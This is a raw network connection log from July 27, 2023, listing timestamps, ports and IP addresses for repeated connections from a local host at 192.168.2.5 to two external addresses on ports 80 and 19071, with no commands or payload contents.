Jul 27, 2023 01:34:16.650285959 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.765228987 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.765948057 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.810137987 CEST	80	49990	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.810473919 CEST	49990	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.810509920 CEST	80	49991	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.811233997 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.811749935 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.856345892 CEST	80	49991	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.861608982 CEST	80	49991	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:16.862096071 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:16.938319921 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:16.985235929 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:16.985275984 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:16.985302925 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:16.985394955 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:16.985471010 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:16.985471010 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:17.010957003 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.011868954 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.056003094 CEST	80	49991	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.056026936 CEST	80	49992	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.056137085 CEST	49991	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.056181908 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.056745052 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.101008892 CEST	80	49992	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.105307102 CEST	80	49992	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.105385065 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.253242016 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.254117966 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.297648907 CEST	80	49992	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.297871113 CEST	80	49993	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.297933102 CEST	49992	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.297966957 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.300000906 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.343923092 CEST	80	49993	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.348370075 CEST	80	49993	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.349759102 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.466990948 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.468456984 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.510968924 CEST	80	49993	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.512166977 CEST	49993	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.512368917 CEST	80	49994	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.512481928 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.520832062 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.532371998 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:17.564783096 CEST	80	49994	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.569597006 CEST	80	49994	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.570010900 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.578414917 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:17.578463078 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:17.578511953 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:17.578553915 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:17.691490889 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.692451954 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.735610008 CEST	80	49994	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.736742020 CEST	80	49995	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.736830950 CEST	49994	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.736882925 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.737358093 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.781645060 CEST	80	49995	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.786513090 CEST	80	49995	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.786658049 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.809968948 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:17.904562950 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.905483961 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.949171066 CEST	80	49995	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.949295998 CEST	49995	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.950023890 CEST	80	49996	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:17.950134039 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.950701952 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:17.994949102 CEST	80	49996	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.000893116 CEST	80	49996	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.001409054 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.107809067 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.108478069 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.152240038 CEST	80	49996	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.152618885 CEST	80	49997	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.152719975 CEST	49996	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.152781963 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.154798985 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.199099064 CEST	80	49997	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.238967896 CEST	80	49997	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.239219904 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.341939926 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.342753887 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.386596918 CEST	80	49997	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.387005091 CEST	80	49998	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.387156963 CEST	49997	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.387191057 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.387715101 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.431921959 CEST	80	49998	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.474417925 CEST	80	49998	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.474548101 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.588013887 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.600614071 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.632512093 CEST	80	49998	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.632595062 CEST	49998	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.644753933 CEST	80	49999	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.644885063 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.645324945 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.689208031 CEST	80	49999	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.693546057 CEST	80	49999	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.693672895 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.811091900 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.811880112 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.855212927 CEST	80	49999	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.855317116 CEST	49999	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.856477022 CEST	80	50000	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.856595039 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.857589006 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:18.902470112 CEST	80	50000	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.906615973 CEST	80	50000	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:18.906723976 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.020416021 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.022078991 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.065645933 CEST	80	50000	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.065840960 CEST	50000	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.066692114 CEST	80	50001	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.066811085 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.074866056 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.119426012 CEST	80	50001	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.123893023 CEST	80	50001	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.123989105 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.232582092 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.234097004 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.277292967 CEST	80	50001	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.277373075 CEST	50001	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.278562069 CEST	80	50002	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.278646946 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.283188105 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.327547073 CEST	80	50002	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.331818104 CEST	80	50002	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.331902981 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.461848021 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.462723970 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.507479906 CEST	80	50002	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.507572889 CEST	50002	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.508116007 CEST	80	50003	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.508199930 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.508650064 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.553345919 CEST	80	50003	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.557003975 CEST	80	50003	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.557085991 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.686116934 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.687423944 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.730407000 CEST	80	50003	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.730463982 CEST	50003	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.731547117 CEST	80	50004	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.731638908 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.736316919 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.780790091 CEST	80	50004	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.784987926 CEST	80	50004	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.785089970 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.943244934 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.944055080 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.987548113 CEST	80	50004	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.987623930 CEST	50004	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.988290071 CEST	80	50005	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:19.988387108 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:19.990180016 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.034435987 CEST	80	50005	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.039556026 CEST	80	50005	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.039625883 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.159681082 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.160568953 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.204075098 CEST	80	50005	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.204166889 CEST	50005	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.204886913 CEST	80	50006	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.204979897 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.205437899 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.250464916 CEST	80	50006	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.255646944 CEST	80	50006	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.255747080 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.364965916 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.365822077 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.409218073 CEST	80	50006	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.409291983 CEST	50006	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.410032988 CEST	80	50007	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.410109997 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.411632061 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.455986023 CEST	80	50007	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.480606079 CEST	80	50007	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.480680943 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.593205929 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.601790905 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.637562037 CEST	80	50007	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.637624025 CEST	50007	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.646374941 CEST	80	50008	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.646490097 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.646996021 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.691216946 CEST	80	50008	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.696115971 CEST	80	50008	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.696217060 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.823599100 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.824418068 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.867943048 CEST	80	50008	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.868047953 CEST	50008	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.868303061 CEST	80	50009	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.868772984 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.869402885 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:20.913196087 CEST	80	50009	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.918095112 CEST	80	50009	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:20.920660019 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.033123016 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.033922911 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.077469110 CEST	80	50009	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.078083992 CEST	80	50010	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.078174114 CEST	50009	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.078221083 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.080696106 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.125017881 CEST	80	50010	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.130582094 CEST	80	50010	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.130671978 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.242471933 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.243998051 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.286892891 CEST	80	50010	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.287138939 CEST	50010	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.288235903 CEST	80	50011	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.288374901 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.288976908 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.333175898 CEST	80	50011	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.337984085 CEST	80	50011	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.341434956 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.462471962 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.463361979 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.507087946 CEST	80	50011	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.507196903 CEST	50011	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.507535934 CEST	80	50012	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.507613897 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.518992901 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.563344955 CEST	80	50012	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.567137957 CEST	80	50012	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.568708897 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.673820019 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.679687023 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.718290091 CEST	80	50012	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.718513012 CEST	50012	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.724648952 CEST	80	50013	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.724792004 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.725615978 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.770380974 CEST	80	50013	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.774426937 CEST	80	50013	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.774566889 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.890100956 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.890121937 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.935102940 CEST	80	50014	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.935163975 CEST	80	50013	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.935267925 CEST	50013	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.935902119 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.935902119 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:21.980593920 CEST	80	50014	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.984183073 CEST	80	50014	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:21.985670090 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.093218088 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.094105005 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.138309956 CEST	80	50014	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.139230967 CEST	80	50015	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.139375925 CEST	50014	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.139429092 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.140031099 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.184684992 CEST	80	50015	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.188034058 CEST	80	50015	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.188127041 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.296202898 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.297045946 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.341077089 CEST	80	50015	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.341272116 CEST	80	50016	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.341394901 CEST	50015	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.341460943 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.342011929 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.386369944 CEST	80	50016	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.390511036 CEST	80	50016	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.390624046 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.509396076 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.548079014 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.555350065 CEST	80	50016	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.555479050 CEST	50016	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.577099085 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.585901976 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.592809916 CEST	80	50017	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.592978954 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.599003077 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.622756004 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:22.629131079 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.634807110 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:22.637378931 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.643594027 CEST	80	50017	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.647208929 CEST	80	50017	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.647633076 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.674063921 CEST	19071	49913	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:22.682892084 CEST	19071	49911	77.91.124.84	192.168.2.5
Jul 27, 2023 01:34:22.732153893 CEST	49911	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.732168913 CEST	49913	19071	192.168.2.5	77.91.124.84
Jul 27, 2023 01:34:22.768414974 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.769340038 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.818857908 CEST	80	50018	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.818911076 CEST	80	50017	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.819109917 CEST	50017	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.819534063 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.829123974 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:22.873631001 CEST	80	50018	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.878803968 CEST	80	50018	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:22.879643917 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.000536919 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.002763987 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.047533035 CEST	80	50018	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.047740936 CEST	50018	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.049774885 CEST	80	50019	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.049947977 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.050478935 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.094810963 CEST	80	50019	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.099885941 CEST	80	50019	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.100053072 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.220304966 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.221010923 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.264730930 CEST	80	50019	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.264787912 CEST	80	50020	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.264890909 CEST	50019	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.264946938 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.269845009 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.314923048 CEST	80	50020	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.319370985 CEST	80	50020	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.319510937 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.441685915 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.454077959 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.485840082 CEST	80	50020	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.489737988 CEST	50020	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.498620987 CEST	80	50021	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:23.503499985 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.506516933 CEST	50021	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:23.550761938 CEST	80	50021	77.91.68.61	192.168.2.5
